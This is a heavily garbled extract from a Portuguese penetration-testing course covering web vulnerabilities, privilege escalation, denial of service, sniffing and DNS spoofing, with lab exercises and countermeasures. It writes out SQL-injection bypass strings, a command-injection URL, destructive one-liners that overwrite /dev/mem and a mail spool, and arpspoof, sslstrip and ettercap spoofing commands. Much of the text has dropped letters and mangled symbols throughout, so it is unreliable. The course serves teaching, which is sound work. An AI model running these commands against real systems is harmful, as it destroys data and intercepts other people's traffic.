11!1%! Contramedidas Hma boa polítia de senasE de forma a garantir que? ●
Senas são troadas periodiamente
●
4 sena deve ter no mínimo arateres
●
4 sena deve ser omple
●
4 mesma sena não pode ser usada dentro de um período mínimo
Capítulo 11 !&n%&a" de orça ruta - 138
Capítulo 1% =ulnera#ilidades em apli.aç*es Ge#
1%!1! "#$etivos ●
●
;ntender o funionamento das apliaç%es Geb 4prender a e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 139
1%!%! 7ntendendo a apli.ação Ge# 4pliaç%es Geb são programas que fiam em um servidor Geb e e
8ebmails
●
Geb f7runs
●
+logs
●
/ojas virtuais
1%!)! Por &ue ' tão perigoso( O objetivo de tentar e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 140
e
;ssa Qltima parte pode ser um pouo mais ompliada de onseguir. 'o entantoE utiliDando da engenaria soial possível onseguir que o administrador do site faça o upload do arquivo para o siteE ou at mesmo le passe os dados para faDer o login do ftp do servidor onde o site alvo est3 ospedado.
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 141
1%!4! Prin.ipais Classes de =ulnera#ilidades +aseado no O$ 1* O84S$E que um ran:ing das 1* maiores vulnerabilidades 8;+ atualiDado anualmenteE seguem abai
Command Injetion
●
SR/ Injetion
●
Cross Site Sripting KSSJ
●
CSBF
●
Inseure -iret Objet Beferene
●
Fala de 4utentiação e gereniamento de sessão
●
Falas em onfiguração de segurança
●
Inseure CrAptograpi Storage
●
Failure to Bestrit HB/ 4ess
●
Insuffiient ransport /aAer $rotetion
●
Hnvalidated Bedirets and ForGards
12.4.1. Co((an InKe!"ion Falas dessa lasse lasse oorrem oorrem simplesment simplesmente e porque o programador programador não filtrou filtrou o onteQdo que reebe de um usu3rio e envia para funç%es que e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 142 #ttp:$$%%%"#ostvuln"com$meuscript"cgi7fileL\id\unameMB0-a
'o e
12.4.2. Co((an InKe!" - Sell P:P Hm dos mais famosos sell em pp o C55E riada pelo Captain Crun SeuritA eamE eamE mas e
4 partir de um site vulner3velE podemos amar a sell que est3 ospedada em um site e simplesmente omeçar a operar dentro do site omo se tivVssemos na lina de omando. Como por e
12.4.3. SL InKe!"ion SR/ SR/ Inje Injet tio ion n um probl problem ema a que que oor oorre re quan quando do o progra programa ma não não filt filtra ra arateres espeiais enviados pelo usu3rio antes de faDer a requisição para o bano de dadosE enviando arateres que serão interpretados pelo bano de dados. SR/ Injetion mais omum em apliaç%es GebE porm outros tipos apliaç%es tambm
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 143
podem estar vulner3veis. @amos @amos analisar o treo de 7digo abai
Como fiaria a amada no bano de dados se envi3ssemos no username e passGord o onteQdo? or 11 ! Beposta? Select from usuarios %#ere %#ere username L ` or `L` and pass%ord L ` or `L`\
Onde? - Oec#a a variavel de entrada do usuario '9 - ?ontinua a e4press3o S@ L - ma e4press3o verdadeira
Como 1 sempre igual a 1E teremos uma XverdadeY e passaremos pela eagem. ;sse um tipo de dados que poderíamos passar para apliativos vulner3veis e burlar o sistema de autentiação. Faremos Faremos isso na pr3tia om o 8eb9oat. E3emplos de SLG InMection ? InMection ? or or L or LorL or aLa J or aLa or L
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 144
12.4.4. Cross-Si"e S!ri$"in# >SS Cros Cr oss, s,si site te sri sript ptin ing g KS KSSJ um tipo tipo de vuln vulner erab abil ilid idad ade e de segu segura ranç nça a tipiamente enontrada em apliaç%es Geb que permite inserção de 7digos por usu3rios Geb maliiosos dentro das paginas vistas por outros usu3rios. ;
Se obtiverem a mensagem PavaSript XOl3 #/inu
Ruando o navegador da vítima abrir este Pava Sript injetadoE o seu oo:ie ser3 enviado para o site do ataante. KSS tambm amplamente usado para $isingE na tentativa de dar mais valor a informação fraudulenta que foi enviada para o alvoE pois o alvo ver3 uma fonte onfi3vel site vulner3velJ. 4 solução para o problema simplesE apesar de não ser tão simples implement3,la. +asta substituir os arateres L e N que são reebidos pelos usu3rios por lt e gt respetivamenteE pois o lt usado para imprimir o sinal de menor LJ na telaE que o que o usu3rio est3 de fato enviando e não deve ser interpretado pelo
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 145
navegador Geb do liente. ambm e
12.4.5. CS9 ●
Semelante a KSS igual!J Os parUmetros utiliDados e o formato de ataque muito pareido om o KSS. InlusiveE o tipo de ataque CSBF surgiu a partir do KSSE quando os ataantes pereberam que a partir da amada para e
●
Rualquer sistema vulner3vel a KSS est3 vulner3vel a KSBF Como KSS pode servir de suporte para lançar ataques do tipo CSBFE toda apliação que vulner3vel ao primeiroE pode ser e
●
'em toda apliação vulner3vel a KSBF est3 tambm vulner3vel a KSS = possível utiliDar filtros para minimiDar ataques KSSE mas nem sempre esses filtros onseguem barrar entradas maliiosas que utiliDam outras metodologias para lançar um ataque CSBF. $ortantoE se a apliação est3 protegida de KSSE não se pode onfiar que tambm esteja protegida de CSBF.
●
$ermite alterar as informaç%es enviadas ao navegador. $ermite ir alm dos ataques de KSSE manipulando os parUmetros que são
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 146
enviados ao navegadorE alterando a resposta do mesmo para a vítima. ●
4taque lient,side 'ão afeta diretamente o servidorE que pode nem mesmo detetar que est3 sendo alvo de um ataqueE pois as entradas maliiosas podem ser onfundidas om entradas v3lidas vinda do liente aessando a apliação.
●
'ão se baseia em e
●
+aseia,se em enviar requisiç%es om as redeniais do usu3rio para o servidor. Como itado anteriormenteE o servidor não onsegue difereniarE perante esse tipo de ataqueE o que 7digo maliioso ou usu3rio ilegítimoJE de uma requisição legítima vinda do usu3rio v3lido.
12.4.6. Inse!'re Dire!" O%Ke!" eferen!e Confiar em informaç%es passadas pelo usu3rio? ●
Campos idden
●
Coo:ie adminfalseJ
;sse tipo de vulnerabilidade simplesmente e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 147
Sempre que quiser aessar a apliação omo XadminYE ter3 essa permissãoE omo se ouvesse enviado uma requisição v3lidaE baseada em um objeto refereniado e maneira insegura. 4bai
$ermite e
/oal File Inlude
'ossibilidades ? ●
4essar 4rquivos do Sistema Operaional
●
;nquadra,se em Information /ea:
●
Obter lista de usu3rios &et&passGdJ
●
Obter informaç%es do servidor ; &pro&J
●
Obter informaç%es de onfiguraç%es ; &et&resolv.onfJ
●
+O'HSJ $ermite e
●
4@4'4-OJ $ermite obter sena de aesso ao servidor
12.4.7. 9ala e &'"en"i!a)=o e #eren!ia(en"o e sess=o odas as veDes que um usu3rio preisa autentiar,se em uma p3gina para aessar onteQdos pessoaisE propriet3rios ou sigilososE uma srie de parUmetros enviada ao servidor para que o mesmo valide o usu3rio e rie uma sessão pr7pria para o mesmo. Se esse meanismo tiver falasE um ataante pode e
$ 5ue N sessãoO
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 148
4 sessãoE session em inglVsE tem uma função bem pareida om a do oo:ieE que foi e
$ 5ue N coo=ieO Coo:ies são arquivos de te
que est3 visualiDando o siteE usamos os oo:ies. $or e
Como fa.er um ata5ue P sessãoO ➢
➢
Session QiMac=ing ●
4travs de falas de KSS
●
4travs de Sniffer de rede loalJ
●
4travs de oo:ies armaDenados
Session Fi3ation ●
'ão neess3rio estar logado
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 149
●
●
9era,se uma sessão para o usu3rio
●
;spera,se ele autentiar e utiliDa,se a sessão j3 oneida.
Solução ●
'ão utiliDe oo:ies !J
●
'una armaDene informaç%es que não podem ser modifiadas?
●
●
➢
adminfalse
➢
logadofalse
➢
userid1**1
'una utiliDem algoritmos pr7prios de geração de to:ens de oo:ie
'roteção contra Se5uestro de Sessão por ;SS ●
4 fala não est3 na sessão
●
o:ens em formul3rios
●
>ttpOnlA
●
HtiliDar riptografia ttpsJ
●
8eb 4ppliation FireGall
12.4.8. Inse!'re Cr$"o#ra$i! S"ora#e odas as informaç%es reebidas ou manipuladas por uma apliação 8;+E fiam armaDenadas em algum loalE seja ele um bano de dados no mesmo servidorE ou remoto. 4 forma omo essas informaç%es estão sendo armaDenadas em uma base de
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 150
dadosE por e
Senas fraas +rute,fore
●
Senas fortes 8ordlist
●
BainboGra: ] as sites
●
6d( 8eb Cra:ers - #ttp:$$%%%"md!crac&"com$
4iferenças) ●
+rute,fore 'ormal? "(* mil%es de senas te
●
BainboG 02.22" mil%es de senas em te
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 151
12.4.. 9ail're "o es"ri!" <L &!!ess
●
Controle de sessão para aessar as p3ginas.
'em sempre todas as p3ginas de uma apliação podem estar aessíveis aos lientes que navegam por ela. 'a maioria das veDesE 3 alguma parte da apliaçãoE ou sessão espeífia de um siteE que não pode ser aessada por todosE mas apenas por usu3rios adastrados que se autentiquem atravs de algum sistema de autentiação e ontrole de aesso. ●
Sem qualquer ontrole de permissão entre as p3ginas. Isso s7 oorre quando todas as sess%es do site são abertas a quem estiver
navegando pelo mesmo. 'ormalmenteE aontee em sites mais simplesE que não manipulam informaç%es onfideniais. ●
Se tiver uma sessão possível aessar qualquer p3gina. Ruando 3 o gereniamento de aesso e autentiação de usu3rios para
aessar p3ginasE gerada uma sessãoE ou oo:ieE om a validação do usu3rio. Com o usu3rio validadoE o liente pode aessar qualquer p3gina do site de aordo om suas permiss%es. O que poderia oorrer se ouvesse um sequestro de sessão desse usu3rio validado! O ataante teria aesso à todas as p3ginas uja permissão do usu3rio possibiliteW ; se ainda utiliDar a tnia de Xsession fi
1%!-! Aerramentas para e8ploração ●
FireCat , onjunto de plugins para o firefo<.
●
Firebug , plugin do firefo< para alteração de parUmetro no broGser liente.
●
8ebSarab , pro
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 152
enviados pelo navegador. ●
$aros $ro
●
'essus , ferramenta de varredura em busa de vulnerabilidadesE baseado em plugins onstantemente atualiDadoE esritos em '4S/.
●
'i:to , ferramenta de busa de vulnerabilidades e falas de onfiguração do 8ebserver 4pae.
●
I;8at , um plugin para o 6irosoft Internet ;
●
8iresar: , sniffer de rede que possibilita a an3lise de protoolos e filtro de paotesE a partir de regras personaliDadasE que trafegam na rede.
●
8apiti , sanner de vulnerabilidade de apliaç%es GebE pesquisa falas KSSE injeção de SR/ e K$atE inlus%es de arquivo loal e remotoJ a e
●
8"4F frameGor: para auditoria e teste de invasão em apliaç%es Geb.
1%!6! Pr/ti.a dirigida 12.6.1. Paros Pro $rimeiramenteE importante entender omo a ferramenta $aros $ro
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 153
ele envia antes o pedido para o pro
1%!! ?a#orat9rio O 5e#oat ●
Iremos testar ada uma das vulnerabilidades estudadas utiliDando a ferramenta 8eb9oat.
●
4p7s e
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 154 ●
4essar o endereço? #ttp:$$guest:guestGBE"0"0":8080$%e)goat$attac&
●
4lgumas serão e
●
4s soluç%es enontram,se na pr7pria apliação.
●
>3 um lin: para os vídeos om as soluç%es na pr7pria apliaçãoE tambmE aso as dias esritas não estejam laras.
12.7.1. Sol')es $ara os esafios B eboat Code Luality +asta olar o 7digo fonte do tmlE pois o login e sena estão omentados no 7digo. B InMection Flas -B Command InMection $reisamos injetar um omando. 'o aso do 8indoGsE devemos usar o para usar mais de um omando na mesma lina. O no 8indoGs seria omo o do linu
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 155
$ara resolver o problemaE devemos testar em todas as posiç%esE todos os arateres. ;
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 156
+asta usar o $arosE faDer a requisição e inserir ? OB 11 ;
1%!2! Contramedidas ●
Filtrar os dados do usu3rioE permitindo somente o onjunto de arateres v3lidos para o tipo de dado permitido.
●
Criptografar >4S>s de senas.
●
HtiliDar SS/ e >$S.
●
'ão riar bla:listsE mas sim Gitelists
●
Xall input is evil .....Y
Capítulo 12 ulnera%l%dade" e apl%&aç.e" :e - 157
Capítulo 1) 7levação de Privil'gios ?o.ais
1)!1! "#$etivos ●
;ntender a elevação de privilgios
●
$rourar por possíveis alvos
●
;ntender as possibilidades de ataques loais
●
;ntender a elevação de privilgios
●
$rourar por possíveis alvos
●
;ntender as possibilidades de ataques loais
Capítulo 13 )le#ação de r%#%lg%o" o&a%" - 158
1)!%! " &ue ' es.alada de privil'gios( ;salação ou elevação de privilgios basiamente signifia adiionar mais direitos ou permiss%es para um usu3rio. ;m resumoE esalação de privilgios tenta transformar um usu3rio normal em um usu3rio administrativoE usu3rio om maior privilgios do que o usu3rio atual ou faDer om que um usu3rio partiipe de outros grupos loais na m3quinaE om privilgio diferente do privilgio atual do ataante. Ruando e
;
●
;
●
;
●
Ruando onseguimos uma sena loalE sem privilgio administrativo. ;<.? +rutefore em servidor ss
Capítulo 13 )le#ação de r%#%lg%o" o&a%" - 159
1)!)! Possíveis alvos 'ormalmenteE apliaç%es que possuem suidroot são as mais e
4lm de arquivos om suidrootE tambm podem ser e
1)!4! Passo a passo 1. Obter aesso loal ao sistema 2. $rourar possíveis alvos ". entar e
Capítulo 13 )le#ação de r%#%lg%o" o&a%" - 160
#. 4essar as informaç%es j3 om privilgio maior do que o privilgio anterior
1)!-! ?a#orat9rio 13.5.1. Desafio 1 1. 4travs do $>$ SellE e
testeE
2. +usar um e
13.5.2. Desafio 2 1. 4 outra tarefaE e
1)!6! Contramedidas ●
6anter o sistema atualiDado.
●
-ei
Capítulo 13 )le#ação de r%#%lg%o" o&a%" - 161
Capítulo 14 Testando o sistema
14!1! "#$etivos ●
;ntender omo oorrem ataques de negação de serviço
●
;ntender o que -oSE --oSE e -B-oS
●
;ntender o que e omo realiDar sequestro de sessão
Capítulo 14 !e"tando o "%"tea - 162
14!%! " &ue ' negação de serviço( Ruem aompana os notii3rios de inform3tia ou o pr7prio +oletim 4nti,@írus 4nti,@írus do Info8ester ertamente j3 se deparou om matrias que itam ataques -oS ou ataques --oS a sites. O objetivo deste apítulo dar e
Contra -'S da elefonia ✔
●
Contra sistema de votação do +++ ✔
●
SpeedA
9lobo
Contra sites de update ✔
update.mirosoft.om
Capítulo 14 !e"tando o "%"tea - 163 ●
Contra sites grandes? ✔
C''
✔
Taoo Taoo
14!)! @oS -e aordo om a definição do C;B Computer ;mergenA Besponse eamJE os ataques -oS -enial of ServieJE tambm denominados 4taques de 'egação de ServiçosE onsistem em tentativas de impedir usu3rios legítimos de utiliDarem um determinado serviço de um omputador. $ara issoE são usadas tnias que podem? sobr sobre earr arreg egar ar uma uma rede rede a tal tal pont ponto o em que que os verd verdade adeiro iross usu3 usu3ri rios os dela dela não não onsigam us3,la derrubar uma one<ão entre dois ou mais omputadores faDer tantas requisiç%es a um site at que este não onsiga mais ser aessado negar aesso a um sistema ou a determinados usu3rios. ;
Capítulo 14 !e"tando o "%"tea - 164
e então passa a reusar novos pedidos. Outra forma de ataque omum o H$- $a:et StormE onde um omputador faD soliitaç%es onstantes para que uma m3quina remota envie paotes de respostas ao soliitante. 4 m3quina fia tão sobrearregada que não onsegue e
ing da (orte (orte
14.3.1. Fe($lo e a"aM'es DoS
Em Ginu3 ? U :J :V:_ h\: U dd ifL$dev$6ero ofL$var$spool$mail$meuKusua ofL$var$spool$mail$meuKusuario rio U perl Q e %#ile J for&J\ open Uf#, bZ$proc$meminfo\ bZ$proc$meminfo\ open U#f, bP$tmp$)la\ h U dd ifL$dev$urandom ofL$dev$mem U perl -e for& %#ile for&
Em indos? indos? ●
;m um .bat? [*M[* Ou? :s start M0
Capítulo 14 !e"tando o "%"tea - 165 goto :s
14.3.2. Pr"i!a iri#ia ●
C#
O C# uma ferramenta que gera ataques de -oS em redes loais om ST' Flood . @amos oneV,la um pouo maisE digitando no terminal? U"$c>
Com esse omandoE teremos omo retorno a sinta
defaults to random J
,t atta: timeout
defaults to foreverJ
,l [ of bo< lin: to use
defaults to 1**[ J
@amos @amos formar duplas e realiDar ataques de -oS na m3quina do ompaneiro de e
14!4! @@oS O --oSE sigla para -istributed -istributed -enial -enial of ServieE ServieE um ataque -oS ampliadoE ampliadoE ou sejaE que utiliDa at milares de omputadores para ataar um determinado alvo.
Capítulo 14 !e"tando o "%"tea - 166
;sse um dos tipos mais efiaDes de ataques e j3 prejudiou sites oneidosE tais omo os da C''E 4maDonE TaooE 6irosoft e e+aA. $ara que os ataques do tipo --oS sejam bem,suedidosE neess3rio que se tena um nQmero grande de omputadores para faDerem parte do ataque. Hma das melores formas enontradas para se ter tantas m3quinasE foi inserir programas de ataque --oS em vírus ou em softGares maliiosos. ;m um primeiro momentoE os a:ers que riavam ataques --oS tentavam ZesraviDarZ omputadores que agiam omo servidores na internet. Com o aumento na veloidade de aesso à internetE passou,se a e
Capítulo 14 !e"tando o "%"tea - 167
Como e
14.4.1. 9erra(en"a e DDoS
TF7*? ;sta foi a primeira ferramenta de ataque --oS disponível publiamente. O F' foi esrito por 6i
H-$ Flooding
●
C$ ST' Flooding
●
IC6$ Flooding
●
e Smurf 4tta:.
O ontrole dos mestres feito por lina de omandoE e a e
Capítulo 14 !e"tando o "%"tea - 168
programa deve ser aompanada dos parUmetros desejados om a sinta
14!-! Prin.ipais tipos de ata&ues 14.5.1. Pin# 9loo $ing flood um ataque de negação de serviço simples no qual o ataante sobrearrega o sistema vítima om paotes IC6$ ;o Bequest paotes pingJ. ;ste ataque apenas bem suedido se o ataante possui mais largura de banda que a vitima. Como a vitima tentar3 responder aos pedidosE ir3 onsumir a sua largura de banda impossibilitando,a responder a pedidos de outros utiliDadores. 4s Qnias maneiras de proteger deste tipo de ataque limitando o tr3fego do ping na sua totalidade ou apenas limitando o tr3fego de paotes IC6$ ;o Bequest om um tamano menos elevado.
Capítulo 14 !e"tando o "%"tea - 169
14.5.2. SN 9loo ST' flood ou ataque ST' uma forma de -oSJ em sistemas omputadoriDadosE na qual o ataante envia uma seqVnia de requisiç%es ST' para um sistema,alvo. Ruando um liente tenta omeçar uma one<ão C$ om um servidorE o liente e o servidor troam um srie de mensagensE que normalmente são assim? ●
●
●
O liente requisita uma one<ão enviando um ST' sAnroniDeJ ao servidor. O servidor onfirma esta requisição 4Ca:noGledgeJ de volta ao liente.
mandando
um
ST',
O liente por sua veD responde om um 4CE e a one<ão est3 estabeleida.
Capítulo 14 !e"tando o "%"tea - 170
Isto o amado aperto de mão em trVs etapas ree,8aA >andsa:eJ.
Hm liente maliioso pode não mandar esta Qltima mensagem 4C. O servidor ir3 esperar por isso por um tempoE j3 que um simples ongestionamento de rede pode ser a ausa do 4C faltante. ;sta amada one<ão semi,aberta pode oupar reursos no servidor ou ausar prejuíDos para empresas usando softGares lieniados por one<ão. $ode ser possível oupar todos os reursos da m3quinaE om paotes ST'. Hma veD que todos os reursos estejam oupadosE nenuma nova one<ão legítima ou nãoJ pode ser feitaE resultando em negação de serviço. 4lguns podem funionar mal ou at mesmo travar se fiarem sem reursos desta maneira. 4o ontr3rio do que muitos pensamE não resolve ataque negação de serviço por SAn flood limitando a quantidade de one<%es por minuto omo usar o m7dulo limit ou reent do iptablesJE pois as one<%es e<edentes seriam desartadas pelo fireGallE sendo que desta forma o pr7prio fireGall tiraria o serviço do ar. Se euE por e
Capítulo 14 !e"tando o "%"tea - 171
O fireGall tornou a tarefa do ataante ainda mais f3il. Hm ataque de SAn Flood feito om os I$s forjados spoofJE para que o ataante não reeba os SAn, 4Cs de suas falsas soliitaç%es.
14.5.3. S('rf &""a!/ O Smurf outro tipo de ataque de negação de serviço. O agressor envia uma r3pida seqVnia de soliitaç%es de $ing um teste para verifiar se um servidor da Internet est3 aessívelJ para um endereço de broadast. Hsando spoofingE o ataante faD om que o servidor de broadast enamine as respostas não para o seu endereçoE mas para o da vítima. 4ssimE o omputador, alvo inundado pelo $ing.
14!6! Re.omendaç*es = sugerido que o $en,tester seja auteloso om o uso desse tipo de ataque ou de ferramentas que possam ausar uma negação de serviço. ;<eto em asos que o liente soliite tal tipo de ataqueE não devemos realiDar esse ataqueE pois pode prejudiar os neg7ios da empresa.
Capítulo 14 !e"tando o "%"tea - 172
14!! Se&uestro de Sessão 4 idia por detr3s do ataque de sequestro de sessãoE ou session ija:ingE justamente utiliDar redeniais v3lidas para aessar reursos que não estão disponíveis publiamente. Hm e
,d
;nable verbose debugging output.
●
,I
6onitor & ija: an interative session.
●
,p port
SpeifA te loal port to listen on.
●
ost
SpeifA te remote ost to relaA onnetions to.
●
port
SpeifA te remote port to relaA onnetions to.
14.7.1. 9erra(en"as Outras ferramentas interessantes que podemos itarE são?
Capítulo 14 !e"tando o "%"tea - 173
●
Fireseep
●
Session ief
●
>unt
●
●
Puggernaut SS/ Strip
14!2! Contramedidas InfeliDmente não e
Capítulo 14 !e"tando o "%"tea - 174
14.8.1. 9in DoS = uma ferramenta que foi desenvolvida por um 7rgão do F+I em função da grande quantidade de ataques --oS oorridos. O find_ddos loaliDa no sistema os masters e agentes das ferramentas rin**E ribe Flood 'etGor:E F'2: e Staeldrat.
Capítulo 14 !e"tando o "%"tea - 175
Capítulo 1T'.ni.as de Sniing
1-!1! "#$etivos ●
;ntender 4B$ $oisoning
●
;ntender os protoolos susetíveis a sniffer
●
;ntender a diferença entre >H+ e SGit
●
;ntender -'S $arming
Capítulo 15 !&n%&a" de Sn%ff%ng - 176
1-!%! " &ue ' um snier( Sniffer uma ferramenta apaD de apturar todo o tr3fego de uma rede. 4ssim sendo possível apturar tr3fego maliioso de trojans e tambm apturar as senas que trafegam sem riptografia pela rede. 4p7s uma invasão omum que um ra:er instale um sniffer na m3quina ataada para visualiDar as senas que trafegam em busa de mais aessos dentro da rede. ;mbora seja mais f3il apturar paotes em uma rede que utiliDa ubsE tambm possível realiDar a aptura de dados em redes que utiliDam sGites. 4 tnia de sniffer vem de tempos remotosE quando ouve a neessidade da riação de ferramentas deste tipo para depuração de problemas de rede. $ormE om o tempoE devido a forma que as redes funionavamE as pessoas omeçaram a usar isto para fins maliiososE omo faDer ZesutaZ do tr3fego da rede em busa de informaç%es sensíveis omo e,mailsE ontas de ftpE telnetE snmpE dentre outros.
1-!)! Como surgiu o snier( 4 aptura de tais dados era muito trivial em redes que possuíam >H+sE onde a informação trafegada repliada por toda a rede. Como evoluçãoE surgiram os sGitsE onde a rede passou a trabalar de forma mais segmentadaE enaminando os paotes apenas para a porta onde estava onetado a maquina de destinoE om isso difiultou o uso de ferramentas de sniffer. /ogoE om o apareimento dos sGits surgiram tambm diversas formas de faDer um XbA,passYE uma delas onsistia em XfloodarY a tabela C46 do sGit. ;sta tabela fia na 3rea de mem7ria onde o sGit mantm o mapeamento de $OB4 LN 64C. Ruando faDemos o floodE diversos sGits não onseguem mais aresentar nenuma entrada nela passando a funionar omo um >H+. Hm e
Capítulo 15 !&n%&a" de Sn%ff%ng - 177
do dsniff. 4bai
Outra tnia que surgiu para sniffar redes om sGits a tnia de 4B$ $oisonE ou 4B$ Spoof. Ruando um omputador vai iniiar a omuniação om algum outro ostE devido ao modo de funionamento da pila de protoolosE preiso traduDir seu endereço l7gio I$J no endereço físio 64CJ do seu destinat3rioE observemos abai
S8ell*? t%m:]= tcpdump -ni et#0 #ost AB"F8"B" tcpdump: ver)ose output suppressed, use -v or -vv for full protocol decode listening on et#0, lin&-t
Capítulo 15 !&n%&a" de Sn%ff%ng - 178 0:B:0A"0F08A I AB"F8"B"0 P AB"F8"B": I?( ec#o request, id 8>>, seq , lengt# F> 0:B:0A"0FBB0! I AB"F8"B" P AB"F8"B"0: I?( ec#o repl<, id 8>>, seq , lengt# F> > pac&ets captured E pac&ets received )< filter 0 pac&ets dropped )< &ernel t%m:]=
Como observamosE para que o ost 152.10.2.1*" onsiga se omuniar om o 152.10.2.1 para o envio do IC6$_;C>O_B;RH;S pingJ neess3rio saber o endereço 64C do destinat3rioE ele onsegue isso enviando um paote ao endereço de broadast físio FF?FF?FF?FF?FF?FFJ perguntando quem o 64C daquele determinado I$E o dono do I$ responde a requisiçãoE somente ap7s isto a omuniação oorre. 4p7s esta resolução a maquina loal oloa a resolução em seu ae loalE que pode ser visto om o omando arpE observe abai
+aseados nistoE voVs j3 devem imaginar omo o 8indoGs desobre que e
1-!4! rp Spoo @amos evoluindo nossa e
Capítulo 15 !&n%&a" de Sn%ff%ng - 179
I$_RH;_4_64RHI'4_4/@O_;S4_S;_CO6H'IC4'-O LN S;H_64C. Com isso quando a maquina alvo for montar o paote para envio ela montara om o I$ real do servidor de destino que ela quer aessarE porem utiliDar3 S;H endereço 64CE ou sejaE quando este paote passar pelo sGit o mesmo enaminar3 o paote para voV. = arpspoof -i ZINT9O/?P -t ZIKD'K/@Y'P ZIKKSK/@Y'KY/IK(//9K/9/KSK(/?P = arpspoof -i et#0 -t AB"F8"" AB"F8""E
'o e
1-!-! SS?Strip O funionamento do SS/Strip simplesE substituindo todas as requisiç%es Zttps?&&Z de uma p3gina por Zttp?&&ZE realiDa um 6I6 6an,In,e,6iddleJ entre o servidor e o liente. 4 idia que a vítima e o ataante se omuniquem atravs de >$E enquanto o ataante e o servidor se omuniam em >$SE om o ertifiado do servidor. $ortantoE o ataante apaD de ver todo o tr3fego da vítima em te
Capítulo 15 !&n%&a" de Sn%ff%ng - 180
Configurar o I$ ForGarding? = ec#o b P $proc$s$ipKfor%ard
Bedireionar o tr3fego om iptables? = ipta)les -t nat -/ 99'TIN -p tcp --dport 80 -1 9DI9?T --to-port 8080
BealiDar um ataque 4B$ 6I6 entre as 2 m3quinas? = arpspoof -i et#0 -t ;'STK/@Y' /T/j
Iniiar o SS/StripE definindo um arquivo onde armaDenar3 os dados apturados? = sslstrip -a -l 8080
$ara visualiDar o que foi apturadoE basta e
1-!6! Prin.ipais proto.olos vulner/veis a snier Os protoolos itados abai
Capítulo 15 !&n%&a" de Sn%ff%ng - 181 ●
elnet
●
Blogin
●
>$
●
S6$
●
''$
●
$O$
●
F$
●
I64$
1-!! Prin.ipais Aerramentas 15.7.1. Dsniff -sniff possui diversas ferramentas em seu paote de dados. ambm possui diversos filtrosE apaD de interpretar dados de diversos protoolos. $ara e
15.7.2. F""er!a$ ;
Capítulo 15 !&n%&a" de Sn%ff%ng - 182 = ettercap QTq Q( /9 $$ $$ - dnsKspoof
Os omandos aima realiDam 4B$ Spoof entre todos os osts da rede e o segundo omando realiDaE alm de faDer o 4B$ SpoofE faD tambm o -'S Spoof. $ormE podemos e
15.7.3. TCPD'($ O tpdump um dos maisE se não o mais ZfamosoZ sniffer para sistemas 9'H&/inu<. Com ele podemos realiDar an3lises de redes e soluionar problemas. Sua utiliDação simples e sem mistriosE bastando apenas ter os oneimentos b3sios de redes C$&I$. 4 instalação do tpdump em sistemas -ebian super simplesE bastando e
E3emplos? = tcpdump -i et#0 = tcpdump -i et#0 src #ost AB"F8"0"A = tcpdump -i et#0 dst #ost AB"F8"0" = tcpdump -i et#0 not #ost AB"F8"0"8 = tcpdump -i et#0 dst port 80 = tcpdump -i et#0 src port B88 = tcpdump -ni et#0 src net 0"0"0"0$B> and dst #ost AB"F8"0" and dst port 80 = tcpdump -i et#0 -n -s !00 -c 000 -% file"cap
Capítulo 15 !&n%&a" de Sn%ff%ng - 183
'arKmetros? ●
,s qtde de bAtes apturados do paote o padrão 0J
●
, qtde de paotes
●
,G armaDenar no arquivo
15.7.4. iresar/ 8iresar:E o bom e velo ;terealE um poderoso snifferE que permite apturar o tr3fego da redeE forneendo uma ferramenta poderosa para detetar problemas e entender melor o funionamento de ada protoolo.
Capítulo 15 !&n%&a" de Sn%ff%ng - 184
1-!2! @,S PEarming ;m inform3tia $arming o termo atribuído ao ataque baseado na tnia -'S ae poisoningE que onsiste em orromper o -'S em uma rede de omputadoresE faDendo om que a HB/ de um site passe a apontar para um servidor diferente do original. 4o digitar a HB/ do site que deseja aessar um banoE por e
ttp?&&GGG.tenialinfo.net&papers&$arming.tml
●
ttp?&&GGG.tenialinfo.net&papers&$arming2.tml
Capítulo 15 !&n%&a" de Sn%ff%ng - 185
15.8.1. &"aM'e DNS
$ara redireionar para um site Geb espeífio? = cd $usr$s#are$ettercap$ = mv -f etter"dns etter"dns"old = vim etter"dns / 44"44"44"44 %%%dotJtestdotJcom
;
domínio ou ip que ser3 redireionado
●
<<<.<<<.<<<.<<< I$ do site falso
●
GGG.sitefalso.om.br HB/ do site falso
Comando? = ettercap -i et#0 -T -q - dnsKspoof -( arp $$ $$
1-!! Pr/ti.a dirigida 1. -efinir duplas para a pr3tia. 2. ;speifiar o site que ser3 redireionado e para onde ser3 feito o redireionamento. ". /ançar o ataque no ompaneiro de pr3tiaE e depois inverter os papisE onde ser3 o ataante e o outro o alvo.
Capítulo 15 !&n%&a" de Sn%ff%ng - 186
1-!10! Contramedidas 4 melor defesa ontra um sniffer de rede a riptografia. 4 riptografia não previne o ataque de snifferE pormE um ataante não onseguir3 identifiar os dados que ele apturou. ambm e
Capítulo 15 !&n%&a" de Sn%ff%ng - 187
Capítulo 16 ta&ues a Servidores 57H
16!1! "#$etivos ●
4prender omo enontrar vulnerabilidades em servidores Geb
●
Coneer diferentes as diferenças entre 4pae e IIS
●
-esobrir omo e
Capítulo 16 ;ta
16!%! Tipos de ata&ues Servidores 8;+ normalmente são os primeiros alvos de ataante que queira entrar numa rede que tena uma -6` om servidores pQblios sendo e
16.2.1. DoS ●
Pamming 'etGor:s
●
Flooding Servie $orts
●
6isonfiguring Bouters
●
Flooding 6ail Servers
16.2.2. DDoS ●
F$ +oune 4tta:s
●
$ort Sanning 4tta:
●
$ing Flooding 4tta:
●
Smurf 4tta:
●
ST' Flooding 4tta:
●
I$ Fragmentation&Overlapping Fragment 4tta:
Capítulo 16 ;ta
I$ Sequene $redition 4tta:
●
-'S Cae $oisoning
●
